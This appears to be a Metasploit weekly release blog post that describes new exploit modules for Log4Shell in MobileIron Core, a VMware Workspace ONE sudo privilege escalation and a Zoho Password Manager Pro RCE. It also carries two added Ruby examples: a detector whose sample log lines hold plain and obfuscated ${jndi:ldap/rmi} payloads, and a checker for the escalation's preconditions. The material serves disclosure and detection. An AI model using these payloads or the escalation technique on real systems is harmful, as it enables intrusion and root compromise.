Last updated at Sat, 20 Jan 2024 22:20:44 GMT

Log4Shell in MobileIron Core

Thanks to jbaines-r7 we have yet another Log4Shell exploit. Like the other Log4Shell exploit modules, this one sends a JNDI lookup string (${jndi:...}) in a request field that the vulnerable Log4j 2 instance ends up logging; Log4j resolves the lookup against an attacker-controlled LDAP server, and the Java object that server returns is deserialized and executed, giving unauthenticated remote code execution as the tomcat user. Vulnerable versions of MobileIron Core have been reported as exploited in the wild.
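
As an added illustration (not part of the Metasploit module or of this post), the Ruby below shows the defensive side of the same mechanism: it folds the Log4j lookup-nesting tricks attackers use to hide the jndi: prefix (${lower:j}, ${upper:j}, ${::-j}, ${env:X:-j}) back into the string Log4j 2 itself would resolve, then flags any JNDI lookup in a few constructed access-log lines. The log lines, addresses and helper names are made up for the example.

```ruby
# Added example (not Metasploit code): normalise Log4j 2 lookup obfuscation
# and flag ${jndi:...} strings in log data.

# Fold one innermost lookup body the way Log4j 2 would resolve it, or return
# nil for lookups we deliberately keep (jndi, and anything unknown).
def fold_lookup(body)
  if (m = body.match(/\A(lower|upper):(.*)\z/mi))
    # ${lower:J} -> "j", ${upper:j} -> "J"
    m[1].casecmp?('lower') ? m[2].downcase : m[2].upcase
  elsif (m = body.match(/\A[^:]*:.*?:-(.*)\z/m))
    # ${env:NOPE:-j} and ${::-j} both resolve to their default value "j"
    m[1]
  end
end

# Repeatedly resolve innermost lookups (those with no nested ${...}) until the
# string stops changing. Real lookups such as ${jndi:...} survive unchanged.
def normalize_lookups(str)
  cur = str.dup
  loop do
    nxt = cur.gsub(/\$\{([^${}]*)\}/) do |whole|
      body = Regexp.last_match(1)
      fold_lookup(body) || whole
    end
    break cur if nxt == cur
    cur = nxt
  end
end

# Log4j lowercases the lookup prefix before matching it, so jNdi also fires.
JNDI_RE = /\$\{\s*jndi\s*:[^}]*\}/i

# Returns [[line_number, normalised_lookup], ...] for every JNDI lookup found.
def scan_log(text)
  hits = []
  text.each_line.with_index(1) do |line, no|
    normalize_lookups(line).scan(JNDI_RE).each { |hit| hits << [no, hit] }
  end
  hits
end

# Constructed sample: one benign request and three Log4Shell probes, two of
# them obfuscated. The addresses are documentation ranges, not real hosts.
SAMPLE_LOG = <<~'LOG'
  10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"
  10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"
  10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${lower:J}${upper:n}${lower:d}i:${::-l}${::-d}${env:NOPE:-a}${::-p}://203.0.113.7:1389/a}"
  10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:rmi://203.0.113.7:1099/x}"
LOG

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |no, hit| puts "line #{no}: #{hit}" }
end
```

The point of normalising first is that a plain grep for "jndi" misses the second and third probes entirely; the innermost-first loop mirrors the order in which Log4j's StrSubstitutor resolves nested lookups, so what the detector sees is what the vulnerable library would have executed.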

VMware Workspace ONE Access LPE

Our very own Spencer McIntyre discovered and added a local privilege escalation module for CVE-2022-31660 in VMware Workspace ONE Access. By default the horizon user has write permission to the /opt/vmware/certproxy/bin/cert-proxy.sh script, and the sudo configuration lets that user run the certproxyService.sh script, which in turn executes cert-proxy.sh, without supplying a password. An attacker with a shell as horizon can therefore write arbitrary commands into cert-proxy.sh and run them as root by invoking certproxyService.sh through sudo. Because the horizon user runs the externally facing web application in VMware Workspace ONE Access, CVE-2022-22954 can be leveraged for initial access to the target and chained with this module.
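
The two preconditions above (a script the unprivileged user can edit, and a NOPASSWD sudo entry for the wrapper that runs it) are what a post-exploitation or hardening check would test for. The Ruby below is an added example, not Metasploit's module; it decides from stat() mode bits and a captured sudo -l listing whether the chain is open, and demonstrates the before/after state on a temporary directory that mimics the appliance layout. The sudo -l text, the file mode 0664 and the path of certproxyService.sh are assumptions made for the example.

```ruby
require 'tmpdir'
require 'fileutils'

# Added example (not Metasploit code): check the cert-proxy LPE preconditions
# for a given unprivileged user, offline, against a constructed layout.

# Is the file writable by uid/gids according to its mode bits? Mode bits are
# used instead of File.writable? so the answer does not change when the
# checker itself happens to run as root.
def writable_by?(path, uid:, gids:)
  st = File.stat(path)
  return true if st.mode & 0o002 != 0                          # world-writable
  return true if gids.include?(st.gid) && st.mode & 0o020 != 0 # group-writable
  st.uid == uid && st.mode & 0o200 != 0                        # owner-writable
end

# Commands a user may run via sudo without a password, parsed from `sudo -l`.
# Only the "(runas) NOPASSWD: cmd, cmd" line form is handled.
def nopasswd_commands(sudo_l_output)
  sudo_l_output.each_line.flat_map do |line|
    m = line.match(/NOPASSWD:\s*(.+)$/)
    m ? m[1].split(',').map { |c| c.strip.split(/\s+/).first } : []
  end
end

# The chain exists when the user can edit the script that the NOPASSWD
# wrapper ends up executing.
def cert_proxy_chain_open?(writable_script:, sudo_wrapper:, sudo_l_output:,
                           uid: Process.uid, gids: Process.groups)
  writable_by?(writable_script, uid: uid, gids: gids) &&
    nopasswd_commands(sudo_l_output).include?(sudo_wrapper)
end

# Constructed stand-in for `sudo -l` output as the horizon user; the wrapper
# path is assumed to sit beside cert-proxy.sh. A real listing may differ.
SAMPLE_SUDO_L = <<~'OUT'
  User horizon may run the following commands on this host:
      (root) NOPASSWD: /opt/vmware/certproxy/bin/certproxyService.sh
OUT
WRAPPER = '/opt/vmware/certproxy/bin/certproxyService.sh'

# Demo on a temp directory: the script is first left writable (assumed mode
# 0664 for the example), then tightened as a remediation would.
def demo
  Dir.mktmpdir do |root|
    bin = File.join(root, 'opt/vmware/certproxy/bin')
    FileUtils.mkdir_p(bin)
    script = File.join(bin, 'cert-proxy.sh')
    File.write(script, "#!/bin/bash\n")

    File.chmod(0o664, script)
    before = cert_proxy_chain_open?(writable_script: script, sudo_wrapper: WRAPPER,
                                    sudo_l_output: SAMPLE_SUDO_L)
    File.chmod(0o555, script) # remediation: no write bit for anyone
    after = cert_proxy_chain_open?(writable_script: script, sudo_wrapper: WRAPPER,
                                   sudo_l_output: SAMPLE_SUDO_L)
    [before, after]
  end
end

if __FILE__ == $PROGRAM_NAME
  before, after = demo
  puts "chain open before hardening: #{before}, after: #{after}"
end
```

Note that removing the write bit alone is only half of a fix: the NOPASSWD entry still lets horizon launch the wrapper, so ownership of both scripts and the sudoers rule should be reviewed together.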

XML-RPC Unauthenticated RCE in Zoho Password Manager

Grant Willcox of the Metasploit team added a module that exploits a deserialization flaw in Zoho Password Manager Pro. Sending a single POST request containing XML-RPC data to the /xmlrpc endpoint will result in unauthenticated code execution as NT AUTHORITY\SYSTEM.

New module content (5)

  • Cisco PVC2300 POE Video Camera configuration download by Craig Heffner and Erik Wynter - This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials.
  • BACnet Scanner by Paz - This adds a new scanner module that discovers BACnet devices on the network and extracts the model name, software version, firmware revision, and device description. Once the data is processed, it is displayed on screen and saved to a local XML file.
  • MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits CVE-2021-44228 - This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is an unauthenticated remote code execution in the context of the web application user.
  • VMware Workspace ONE Access CVE-2022-31660 by Spencer McIntyre, which exploits CVE-2022-31660 - This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021. The underlying flaw is that the /opt/vmware/certproxy/bin/cert-proxy.sh script is writable by the horizon user who can also indirectly execute it by invoking the certproxyService.sh script via sudo which is permitted without a password, enabling escalation to root.
  • Zoho Password Manager Pro XML-RPC Java Deserialization by Grant Willcox, Vinicius, and Y4er, which exploits CVE-2022-35405 - This adds an exploit module for CVE-2022-35405, aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE as SYSTEM.

Enhancements and features (3)

  • #16833 from gwillcox-r7 - This PR adds an option to the host command to make it easier to delete host tags.
  • #16840 from bcoles - This replaces some Meterpreter-only method calls with method calls that check the session type, which allows non-Meterpreter sessions to use read_profile_list and load_missing_hives. Also, this changes read_profile_list to be able to read profile information for all accounts.
  • #16858 from adfoster-r7 - This updates ZeroLogon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meaningful message.

Bugs fixed (8)

  • #16820 from gwillcox-r7 - This PR fixes an issue in the ldap_query module where if the datastore option "action" wasn't set the module would fail.
  • #16822 from adfoster-r7 - This fixes a bug in Rex::Ui::Text::Input::Buffer::BufferSock that was causing data to be occasionally lost due to the rsock monitor routine stopping abruptly.
  • #16825 from rbowes-r7 - The IMAP credential capture module did not appropriately handle literal strings as specified by RFC 3501. The code has been updated to handle these strings correctly.
  • #16832 from gwillcox-r7 - This fix removes an unnecessary echo statement from the ms10_092_schelevator module.
  • #16839 from bcoles - Fixes shell_registry_enumvals/getvaldata error checking.
  • #16844 from bcoles - This PR updates the post/multi/gather module to support non-meterpreter sessions like shell and powershell.
  • #16846 from jmartin-r7 - Updates auxiliary/scanner/ssh/ssh_login to gracefully handle Errno::EPIPE exceptions.
  • #16848 from jmartin-r7 - Fix a crash when updating session information in Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).